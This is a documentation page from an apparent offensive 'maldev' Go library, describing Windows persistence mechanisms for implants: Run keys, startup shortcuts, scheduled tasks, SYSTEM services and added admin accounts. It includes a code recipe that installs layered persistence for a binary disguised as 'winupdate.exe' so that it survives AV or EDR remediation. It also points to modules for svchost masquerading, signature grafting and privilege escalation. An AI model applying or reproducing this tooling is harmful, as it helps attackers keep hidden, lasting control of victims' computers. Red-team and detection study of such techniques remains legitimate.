Persistence techniques

← maldev README · docs/index

The persistence/* package tree groups Windows-only mechanisms that re-launch an implant across reboots and user logons. The Mechanism interface is the composition primitive: each sub-package returns a Mechanism, and InstallAll / VerifyAll / UninstallAll operate on a flat slice — operators typically install two or three mechanisms in parallel so failure of any single one (cleanup sweep, AV remediation, EDR auto-roll-back) does not lose persistence.

flowchart TB
    subgraph trig [Triggers]
        LOGON[user logon]
        BOOT[boot]
        SCHED[schedule / time]
        CLICK[user execution]
    end
    subgraph mechs [persistence/*]
        REG[registry<br>HKCU + HKLM<br>Run / RunOnce]
        ST[startup<br>StartUp-folder LNK]
        SCHEDP[scheduler<br>COM ITaskService]
        SVC[service<br>SCM SYSTEM]
        ACC[account<br>local user + admin]
        LNK[lnk<br>shortcut primitive]
    end
    subgraph compose [Composition]
        IFACE[Mechanism interface]
        ALL[InstallAll / VerifyAll / UninstallAll]
    end
    LOGON --> REG
    LOGON --> ST
    LOGON --> SCHEDP
    BOOT --> SVC
    BOOT --> SCHEDP
    SCHED --> SCHEDP
    CLICK --> LNK
    ACC -. companion to .-> SVC
    LNK -. underlying primitive of .-> ST
    REG --> IFACE
    ST --> IFACE
    SCHEDP --> IFACE
    SVC --> IFACE
    IFACE --> ALL

Packages

Quick decision tree

Layered redundancy recipe

The canonical "redundant persistence" pattern installs two mechanisms with different telemetry profiles. Loss of one does not lose persistence; the noisier one provides reach, the quieter one provides resilience.

mechs := []persistence.Mechanism{
    // Loud + reach: SYSTEM-scope service, runs at boot.
    service.Service(&service.Config{
        Name:      "WinUpdate",
        BinPath:   `C:\ProgramData\Microsoft\winupdate.exe`,
        StartType: service.StartAuto,
    }),
    // Quiet + resilience: HKCU Run-key, runs at user logon.
    registry.RunKey(registry.HiveCurrentUser, registry.KeyRun,
        "WinUpdateBackup",
        `C:\ProgramData\Microsoft\winupdate.exe`),
}
errs := persistence.InstallAll(mechs)

MITRE ATT&CK

See also

• Operator path: persistence selection
• Detection eng path: persistence telemetry
• pe/masquerade — clone svchost identity for the persisted binary.
• pe/cert — graft Authenticode signature.
• cleanup — remove persistence artefacts at op end.
• privesc — pair to obtain the admin / SYSTEM tokens HKLM-scope and SCM persistence require.